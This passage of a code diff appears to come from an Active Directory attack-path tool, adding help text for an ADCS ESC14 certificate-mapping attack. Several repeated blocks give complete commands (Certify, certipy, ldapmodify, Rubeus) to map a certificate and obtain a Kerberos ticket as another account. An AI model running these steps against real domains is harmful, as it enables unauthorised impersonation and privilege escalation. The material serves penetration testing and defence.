"CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate + mapping string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + Targeted Kerberoast attack @@ -298,6 +412,11 @@ const WindowsAbuse: FC = Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which + enables an ADCS ESC14 Scenario A attack. + + Retrieve LAPS Password For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -432,6 +551,116 @@ const WindowsAbuse: FC = 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit + certificate mapping string from the 'altSecurityIdentities' attribute of the target + principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + ); } else { @@ -471,6 +700,11 @@ const WindowsAbuse: FC = Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which + enables an ADCS ESC14 Scenario A attack. + + Shadow Credentials attack To abuse the permission, use Whisker. @@ -555,6 +789,116 @@ const WindowsAbuse: FC = 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit + certificate mapping string from the 'altSecurityIdentities' attribute of the target + principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx index 2b20bbe18f9..28f6469536b 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx @@ -17,6 +17,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; import { EdgeInfoProps } from '../index'; +import CodeController from '../CodeController/CodeController'; const LinuxAbuse: FC = ({ sourceName, targetName, targetType, haslaps }) => { switch (targetType) { @@ -214,6 +215,104 @@ const LinuxAbuse: FC = ({ sourceName, targ For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate + and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); case 'Computer': @@ -339,6 +438,106 @@ const LinuxAbuse: FC = ({ sourceName, targ For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the + certificate and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); } else { @@ -420,6 +619,106 @@ const LinuxAbuse: FC = ({ sourceName, targ For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the + certificate and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx index 4e2307b4c8b..a47acb93e02 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx @@ -100,6 +100,13 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
+ + https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9 + +
= equivalent to the "AddKeyCredentialLink" edge. + + The permission also grants write access to the "altSecurityIdentities" attribute, which enables + an ADCS ESC14 Scenario A attack. + + Alternatively, GenericAll enables {sourceName} to set a ServicePrincipalName (SPN) on the targeted user, which may be abused in a Targeted Kerberoast attack. @@ -266,6 +271,115 @@ const WindowsAbuse: FC = For other optional parameters, view the Whisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate + mapping string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + Targeted Kerberoast attack @@ -372,6 +486,11 @@ const WindowsAbuse: FC = Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which + enables an ADCS ESC14 Scenario A attack. + + Retrieve LAPS Password For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -569,6 +688,11 @@ const WindowsAbuse: FC = Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which + enables an ADCS ESC14 Scenario A attack. + + Shadow Credentials attack To abuse the permission, use Whisker. @@ -653,6 +777,116 @@ const WindowsAbuse: FC = 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit + certificate mapping string from the 'altSecurityIdentities' attribute of the target + principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + ); } From 3fdb7a644ba1767b4fdc4e6bfe7e62b7e5319e48 Mon Sep 17 00:00:00 2001 From: JonasBK Date: Tue, 8 Jul 2025 10:38:03 +0200 Subject: [PATCH 5/9] esc14 improvements --- cmd/api/src/test/integration/harnesses.go | 2 +- .../AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx | 221 ++++++++++++ .../HelpTexts/AdcsEsc14ScenarioA/index.ts | 17 + .../HelpTexts/GenericAll/LinuxAbuse.tsx | 302 +--------------- .../HelpTexts/GenericAll/References.tsx | 7 - .../HelpTexts/GenericAll/WindowsAbuse.tsx | 330 +----------------- .../HelpTexts/GenericWrite/LinuxAbuse.tsx | 200 +---------- .../HelpTexts/GenericWrite/WindowsAbuse.tsx | 222 +----------- .../components/HelpTexts/Owns/LinuxAbuse.tsx | 302 +--------------- .../HelpTexts/Owns/WindowsAbuse.tsx | 330 +----------------- .../WriteAltSecurityIdentities/General.tsx | 5 +- .../WriteAltSecurityIdentities/LinuxAbuse.tsx | 104 +----- .../WindowsAbuse.tsx | 109 +----- .../HelpTexts/WriteDacl/LinuxAbuse.tsx | 302 +--------------- .../HelpTexts/WriteDacl/WindowsAbuse.tsx | 330 +----------------- .../HelpTexts/WriteOwner/LinuxAbuse.tsx | 303 +--------------- .../HelpTexts/WriteOwner/WindowsAbuse.tsx | 222 +----------- .../WritePublicInformation/General.tsx | 7 +- .../WritePublicInformation/LinuxAbuse.tsx | 99 +----- .../WritePublicInformation/WindowsAbuse.tsx | 108 +----- 20 files changed, 297 insertions(+), 3225 deletions(-) create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx create mode 100644 packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/index.ts diff --git a/cmd/api/src/test/integration/harnesses.go b/cmd/api/src/test/integration/harnesses.go index 287370579b4..414ccd88a0e 100644 --- a/cmd/api/src/test/integration/harnesses.go +++ b/cmd/api/src/test/integration/harnesses.go @@ -3785,7 +3785,7 @@ func (s *ESC10aPrincipalHarness) Setup(graphTestContext *GraphTestContext) { s.Group4 = graphTestContext.NewActiveDirectoryGroup("Group4", domainSid) s.Group5 = graphTestContext.NewActiveDirectoryGroup("Group5", domainSid) s.Group6 = graphTestContext.NewActiveDirectoryGroup("Group6", domainSid) - s.Group5 = graphTestContext.NewActiveDirectoryGroup("Group7", domainSid) + s.Group7 = graphTestContext.NewActiveDirectoryGroup("Group7", domainSid) s.User2 = graphTestContext.NewActiveDirectoryUser("User2", domainSid) s.Group0 = graphTestContext.NewActiveDirectoryGroup("Group0", domainSid) graphTestContext.NewRelationship(s.RootCA, s.Domain, ad.RootCAFor) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx 